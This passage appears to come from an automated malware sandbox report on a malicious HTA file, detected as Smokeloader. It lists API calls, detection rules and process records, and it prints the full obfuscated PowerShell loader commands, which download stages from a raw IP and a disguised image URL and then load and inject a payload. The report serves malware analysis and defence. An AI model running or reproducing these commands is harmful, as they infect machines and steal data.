'<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402F5D RtlCreateUserThread,NtTerminateProcess,	13_2_00402F5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_00402321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004025D3 NtClose,	13_2_004025D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402686 NtClose,	13_2_00402686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004030BF RtlCreateUserThread,NtTerminateProcess,	13_2_004030BF
Source: C:\Windows\explorer.exe	Code function: 14_2_01212FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,	14_2_01212FAC
Source: C:\Windows\explorer.exe	Code function: 14_2_01214760 NtCreateSection,	14_2_01214760
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02794B92 RtlMoveMemory,NtUnmapViewOfSection,	17_2_02794B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_027933C3 NtQueryInformationFile,	17_2_027933C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_0279342B NtQueryObject,NtQueryObject,RtlMoveMemory,	17_2_0279342B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_0279349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	17_2_0279349B
Source: C:\Windows\explorer.exe	Code function: 18_2_001938B0 NtUnmapViewOfSection,	18_2_001938B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F51016 RtlMoveMemory,NtUnmapViewOfSection,	19_2_02F51016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA3D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,	20_2_02CA3D8D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA1F4E NtCreateSection,NtMapViewOfSection,	20_2_02CA1F4E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA1FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	20_2_02CA1FE5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA2E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,	20_2_02CA2E1B
Source: C:\Windows\explorer.exe	Code function: 21_2_005D5300 NtUnmapViewOfSection,	21_2_005D5300
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02791016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	22_2_02791016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02791819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	22_2_02791819
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02791A80 NtCreateSection,NtMapViewOfSection,	22_2_02791A80
Source: C:\Windows\explorer.exe	Code function: 26_2_005D355C NtUnmapViewOfSection,	26_2_005D355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02791016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	27_2_02791016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_027918BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	27_2_027918BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02791B26 NtCreateSection,NtMapViewOfSection,	27_2_02791B26
Source: C:\Windows\explorer.exe	Code function: 28_2_0014370C NtUnmapViewOfSection,	28_2_0014370C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04207C48	8_2_04207C48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0420BA80	8_2_0420BA80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0420A768	8_2_0420A768
Source: C:\Windows\explorer.exe	Code function: 14_2_01212840	14_2_01212840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02792198	17_2_02792198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_0279C2F9	17_2_0279C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_027AB35C	17_2_027AB35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_027E4438	17_2_027E4438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_027AB97E	17_2_027AB97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02796E6A	17_2_02796E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_027B5F08	17_2_027B5F08
Source: C:\Windows\explorer.exe	Code function: 18_2_00191E20	18_2_00191E20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F5170B	19_2_02F5170B
Source: C:\Windows\explorer.exe	Code function: 21_2_005D2C00	21_2_005D2C00
Source: C:\Windows\explorer.exe	Code function: 26_2_005D2054	26_2_005D2054
Source: C:\Windows\explorer.exe	Code function: 26_2_005D2860	26_2_005D2860
Source: C:\Windows\explorer.exe	Code function: 28_2_00142A04	28_2_00142A04
Source: C:\Windows\explorer.exe	Code function: 28_2_001420F4	28_2_001420F4

Source: C:\Windows\SysWOW64\explorer.exe

Code function: String function: 02798801 appears 38 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7912 -s 420

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: powershell.exe, 00000004.00000002.1766099409.0000000007271000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .sLnW
Source: powershell.exe, 00000004.00000002.1766099409.0000000007271000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .slnW

Source: classification engine

Classification label: mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/33@2/2

Source: C:\Windows\explorer.exe

Code function: 14_2_01213BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,

14_2_01213BF4

Source: C:\Windows\explorer.exe

Code function: 14_2_012135E8 CoCreateInstance,

14_2_012135E8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sweetnessgoodforgreatnessthingswithgood[1].tiff

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Users\user\AppData\Roaming\icgfugf	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7912
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rduhv53q.imh.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: F5AB.tmp.17.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: begoodforeverythinggreatthingsformebetterforgood.hta

Virustotal: Detection: 10%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\begoodforeverythinggreatthingsformebetterforgood.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\icgfugf C:\Users\user\AppData\Roaming\icgfugf
Source: C:\Users\user\AppData\Roaming\icgfugf	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7912 -s 420
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\icgfugf C:\Users\user\AppData\Roaming\icgfugf
Source: C:\Users\user\AppData\Roaming\icgfugf	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; 